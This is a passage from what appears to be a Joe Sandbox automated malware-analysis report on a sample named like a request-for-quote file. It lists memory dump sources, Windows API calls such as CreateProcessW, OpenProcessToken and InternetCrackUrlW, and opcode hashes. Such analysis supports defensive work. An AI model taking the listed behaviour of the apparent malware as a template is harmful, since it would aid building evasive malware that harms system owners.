                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction ID: 81a989765a2b830b32f64bb72a5bf949a9dfa9d2c40b070cdb748fe2a810a79d
                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction Fuzzy Hash: F901803204814EBBCF1A5E84DC018EE3F72BF29354B198525FA1858271C337C9B2AB81
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 0016B59E
                                              • ScreenToClient.USER32(?,?), ref: 0016B5B6
                                              • ScreenToClient.USER32(?,?), ref: 0016B5DA
                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0016B5F5
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClientRectScreen$InvalidateWindow
                                              • String ID:
                                              • API String ID: 357397906-0
                                              • Opcode ID: cfafd2f5ee0f45ccf52a9c4c8b919cd153a0687f70ec17c090907dd219ee8ad4
                                              • Instruction ID: dfb41fca000df48faeafd681628e3d4c5a9cbbc22dc7700f08dbd99f87ef060e
                                              • Opcode Fuzzy Hash: cfafd2f5ee0f45ccf52a9c4c8b919cd153a0687f70ec17c090907dd219ee8ad4
                                              • Instruction Fuzzy Hash: C51166B5D04209EFDB01DF99D8849EEFBB9FB08310F104166E915E3620D771AA618F50
                                              APIs
                                              • _memset.LIBCMT ref: 0016B8FE
                                              • _memset.LIBCMT ref: 0016B90D
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001A7F20,001A7F64), ref: 0016B93C
                                              • CloseHandle.KERNEL32 ref: 0016B94E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memset$CloseCreateHandleProcess
                                              • String ID:
                                              • API String ID: 3277943733-0
                                              • Opcode ID: ac7859b9e6248c5cbe683b105db3a923a2d4cb4c4e11840dd6b066d050c01365
                                              • Instruction ID: cd57ff65f53336a806dceb6446d43e4f61cf367f5c2483a0607b1c7a0ad74f3a
                                              • Opcode Fuzzy Hash: ac7859b9e6248c5cbe683b105db3a923a2d4cb4c4e11840dd6b066d050c01365
                                              • Instruction Fuzzy Hash: D3F05EB25443007FE2102771AC05FBB3A5CEB0A354F000020FA18E56D2E7B14B5087A8
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 00146E88
                                                • Part of subcall function 0014794E: _memset.LIBCMT ref: 00147983
                                              • _memmove.LIBCMT ref: 00146EAB
                                              • _memset.LIBCMT ref: 00146EB8
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00146EC8
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                              • String ID:
                                              • API String ID: 48991266-0
                                              • Opcode ID: 5ef2b3382944367176998e1e597c1aa1052b9aa20ff6be75585c9c5ebdf097f6
                                              • Instruction ID: 9a2c77c7c8ae34175fac89b91f4e8ce047b428a7a6ab3ea5eeefc548659f843f
                                              • Opcode Fuzzy Hash: 5ef2b3382944367176998e1e597c1aa1052b9aa20ff6be75585c9c5ebdf097f6
                                              • Instruction Fuzzy Hash: 66F05E3A204210BBCF016F55EC85A8ABB2AEF55320B048065FE085E26AC771E951CBB4
                                              APIs
                                                • Part of subcall function 000E12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000E134D
                                                • Part of subcall function 000E12F3: SelectObject.GDI32(?,00000000), ref: 000E135C
                                                • Part of subcall function 000E12F3: BeginPath.GDI32(?), ref: 000E1373
                                                • Part of subcall function 000E12F3: SelectObject.GDI32(?,00000000), ref: 000E139C
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0016C030
                                              • LineTo.GDI32(00000000,?,?), ref: 0016C03D
                                              • EndPath.GDI32(00000000), ref: 0016C04D
                                              • StrokePath.GDI32(00000000), ref: 0016C05B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                              • String ID:
                                              • API String ID: 1539411459-0
                                              • Opcode ID: 1b68bae0fbf6a4be1d7891a4835421b417cea6fc21b3379cc1928e87f92bb6e2
                                              • Instruction ID: 0e36b5a12db1598434d439fab2364873dee43dfcaeacf09649ba3ec1fff6ccdf
                                              • Opcode Fuzzy Hash: 1b68bae0fbf6a4be1d7891a4835421b417cea6fc21b3379cc1928e87f92bb6e2
                                              • Instruction Fuzzy Hash: 31F08236105259FBDB126F55BC0DFDE3F59AF06311F144004FA11614E287B959A2CFE5
                                              APIs
                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0013A399
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0013A3AC
                                              • GetCurrentThreadId.KERNEL32 ref: 0013A3B3
                                              • AttachThreadInput.USER32(00000000), ref: 0013A3BA
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                              • String ID:
                                              • API String ID: 2710830443-0
                                              • Opcode ID: c0b642a79b9587d49d0864dd6b0fadbcd82decea2d6f403460c5cd9262ee0265
                                              • Instruction ID: 7121918e5a1729a910bbb031f1424cb068b6c02f787ba99764ae12161d1203c2
                                              • Opcode Fuzzy Hash: c0b642a79b9587d49d0864dd6b0fadbcd82decea2d6f403460c5cd9262ee0265
                                              • Instruction Fuzzy Hash: 7CE0C931545228BAEB205BA2EC0DEE77F5CFF167A1F408029F54995460C7B18581DBA1
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 000E2231
                                              • SetTextColor.GDI32(?,000000FF), ref: 000E223B
                                              • SetBkMode.GDI32(?,00000001), ref: 000E2250
                                              • GetStockObject.GDI32(00000005), ref: 000E2258
                                              • GetWindowDC.USER32(?,00000000), ref: 0011C0D3
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0011C0E0
                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0011C0F9
                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0011C112
                                              • GetPixel.GDI32(00000000,?,?), ref: 0011C132
                                              • ReleaseDC.USER32(?,00000000), ref: 0011C13D
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                              • String ID:
                                              • API String ID: 1946975507-0
                                              • Opcode ID: 9cf6a1021a0d6839a5466a2fb190922a6ab7d9d17cffb44c6917836a060d5d72
                                              • Instruction ID: ef149afab63f23e206823c291d763b2d29bd2ec96acbcd9b0bf3bb63d5172e7c
                                              • Opcode Fuzzy Hash: 9cf6a1021a0d6839a5466a2fb190922a6ab7d9d17cffb44c6917836a060d5d72
                                              • Instruction Fuzzy Hash: 4AE03932544244EADB255FA4FC097D83B14EB16336F04837AFA69980E187B149C1DB52
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 00138C63
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,0013882E), ref: 00138C6A
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0013882E), ref: 00138C77
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,0013882E), ref: 00138C7E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CurrentOpenProcessThreadToken
                                              • String ID:
                                              • API String ID: 3974789173-0
                                              • Opcode ID: 6b621a0ae09bb963aedbff821a2bf51972621053149f505b6995f865d59d8f2a
                                              • Instruction ID: 4c9deea5754b46a5c6930854c57963624980d7270bdc445fad76d3c72828a74d
                                              • Opcode Fuzzy Hash: 6b621a0ae09bb963aedbff821a2bf51972621053149f505b6995f865d59d8f2a
                                              • Instruction Fuzzy Hash: 30E04F36656311ABD7205FB07D0CB973BA8EF507A2F14482CF245C9040DA748482CB61
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00122187
                                              • GetDC.USER32(00000000), ref: 00122191
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001221B1
                                              • ReleaseDC.USER32(?), ref: 001221D2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: ea6cb3d7ae3c4b282465d95a399aae7bc8a4b5a800b5d025c6782427672b54b4
                                              • Instruction ID: 3e5360be0a5cfb9175640559e2d005d5b12348e3212567aed482fe742ffecbb9
                                              • Opcode Fuzzy Hash: ea6cb3d7ae3c4b282465d95a399aae7bc8a4b5a800b5d025c6782427672b54b4
                                              • Instruction Fuzzy Hash: 1CE0E5B5800214EFDB019F61EC08A9D7BF2FB4C351F11C429F95AA7660CBB881829F40
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 0012219B
                                              • GetDC.USER32(00000000), ref: 001221A5
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001221B1
                                              • ReleaseDC.USER32(?), ref: 001221D2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: af931baa326e087373fb6474ab00fd44df0d169941339ef7b7465e768edee32c
                                              • Instruction ID: 97bef13ba40f1528600405a2960cc2e5d681119a7f6a5ae8b12204a846978d3b
                                              • Opcode Fuzzy Hash: af931baa326e087373fb6474ab00fd44df0d169941339ef7b7465e768edee32c
                                              • Instruction Fuzzy Hash: 74E012B9800204AFCB119FB1EC08A9D7BF2FF4C351F10C029F95AA7660CBB891829F40
                                              APIs
                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0013B981
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ContainedObject
                                              • String ID: AutoIt3GUI$Container
                                              • API String ID: 3565006973-3941886329
                                              • Opcode ID: 29bb9210053416bbf3e7db38ef64e0749bd7bbcfdd57170e0788a3b7ee64f900
                                              • Instruction ID: a7c9a52aedefe979cb923ed448b9b38e4c5f7f02ce3002a7b75d5163e345b9fa
                                              • Opcode Fuzzy Hash: 29bb9210053416bbf3e7db38ef64e0749bd7bbcfdd57170e0788a3b7ee64f900
                                              • Instruction Fuzzy Hash: 77914A706046019FDB24DF68C884B6ABBF9FF48710F14856DFA4ADB691EB70E841CB50
                                              APIs
                                                • Part of subcall function 000FFEC6: _wcscpy.LIBCMT ref: 000FFEE9
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • __wcsnicmp.LIBCMT ref: 0014B298
                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0014B361
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                              • String ID: LPT
                                              • API String ID: 3222508074-1350329615
                                              • Opcode ID: e7123e1a48c9c1945655c90c09e9c83d29195b12c29f9222b4c90f61c3defcd0
                                              • Instruction ID: ce9794b440242213c47e24dd67677b0ad40f5e7ba1f3aad4e881f69981c5b1b4
                                              • Opcode Fuzzy Hash: e7123e1a48c9c1945655c90c09e9c83d29195b12c29f9222b4c90f61c3defcd0
                                              • Instruction Fuzzy Hash: 5E617175A04215EFCB18DF99C881EEEB7B4BF48310F15406AF946AB2A1DB70EE41CB50
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 000F2AC8
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 000F2AE1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: GlobalMemorySleepStatus
                                              • String ID: @
                                              • API String ID: 2783356886-2766056989
                                              • Opcode ID: 48d74ae2673cc7b8bd67350fb02e34001f733ef9465097e92dda978f07ec6ee8
                                              • Instruction ID: fb9e5733ea2d5eb08d9e767df904b9cc11bea6316069f0cac75532dd04ac67e5
                                              • Opcode Fuzzy Hash: 48d74ae2673cc7b8bd67350fb02e34001f733ef9465097e92dda978f07ec6ee8
                                              • Instruction Fuzzy Hash: 19514AB14187859FD320AF11DC85BAFB7E8FF84310F82485DF2E9511A2DB318969CB56
                                              APIs
                                                • Part of subcall function 000E506B: __fread_nolock.LIBCMT ref: 000E5089
                                              • _wcscmp.LIBCMT ref: 00149AAE
                                              • _wcscmp.LIBCMT ref: 00149AC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcscmp$__fread_nolock
                                              • String ID: FILE
                                              • API String ID: 4029003684-3121273764
                                              • Opcode ID: 6d2cdda8a3976d76fc695fff5e7181d5d42f0e8bc5ff36c3ce71bdc3b8cab9cc
                                              • Instruction ID: 8929ddde6f35c3a1a69d18d1241715f77e900c7f8601013826ccb5a087cdf403
                                              • Opcode Fuzzy Hash: 6d2cdda8a3976d76fc695fff5e7181d5d42f0e8bc5ff36c3ce71bdc3b8cab9cc
                                              • Instruction Fuzzy Hash: 8041D4B1A00619BEDF209FA5DC46FEFBBBDEF45714F000469B900B7191DBB5AA0487A1
                                              APIs
                                              • _memset.LIBCMT ref: 00152892
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001528C8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CrackInternet_memset
                                              • String ID: |
                                              • API String ID: 1413715105-2343686810
                                              • Opcode ID: ca9ac17d17e8149e8fcc92a0b2c8ce83f4b85dcc988b128a46125fb5af2b2bd0
                                              • Instruction ID: fe5f0c6c2e6952e05b300bddd2832b0424d97a6fd0270b7d26875c66681f5c30
                                              • Opcode Fuzzy Hash: ca9ac17d17e8149e8fcc92a0b2c8ce83f4b85dcc988b128a46125fb5af2b2bd0
                                              • Instruction Fuzzy Hash: 34311A71800119EFCF059FA1CC85EEEBFB9FF19300F14406AF815A6266DB315A56DBA0
                                              APIs
                                              • DestroyWindow.USER32(?,?,?,?), ref: 00166D86
                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00166DC2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$DestroyMove
                                              • String ID: static
                                              • API String ID: 2139405536-2160076837
                                              • Opcode ID: e633056fb3aeec6a45d5fa1fc9b49946cd8a0a232acbade110fd75b412445ce5
                                              • Instruction ID: e5c085bd8086e946a01f001e3bd65b27ea243efc6aaf2c547f631c3d40ce975b
                                              • Opcode Fuzzy Hash: e633056fb3aeec6a45d5fa1fc9b49946cd8a0a232acbade110fd75b412445ce5
                                              • Instruction Fuzzy Hash: 7C318F71210604AEDB109F64DC80AFB77B9FF48724F10961DF9A9D7191DB71ACA1CB60
                                              APIs
                                              • _memset.LIBCMT ref: 00142E00
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00142E3B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 6b7f169bcdfa6636e26ebe2c8a2e4897a2729b59fe3eca41ffd030e5c8be1c61
                                              • Instruction ID: f3eb4ba8c20292a7e7740eaf503379cb3999614a3b6bbc07437d71a285890854
                                              • Opcode Fuzzy Hash: 6b7f169bcdfa6636e26ebe2c8a2e4897a2729b59fe3eca41ffd030e5c8be1c61
                                              • Instruction Fuzzy Hash: F631C131A00309ABEB248F58D885BAEBBB9EF05350F54046AF985E71B0E7B099C4CB50
                                              APIs
                                                • Part of subcall function 000F619A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000F61B1
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0013B03B
                                              • _strlen.LIBCMT ref: 0013B046
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout_strlen
                                              • String ID: @U=u
                                              • API String ID: 2777139624-2594219639
                                              • Opcode ID: 300501f3c34bc67189714a7176891de52c53fdfdf55298683e7e98cdf07053f3
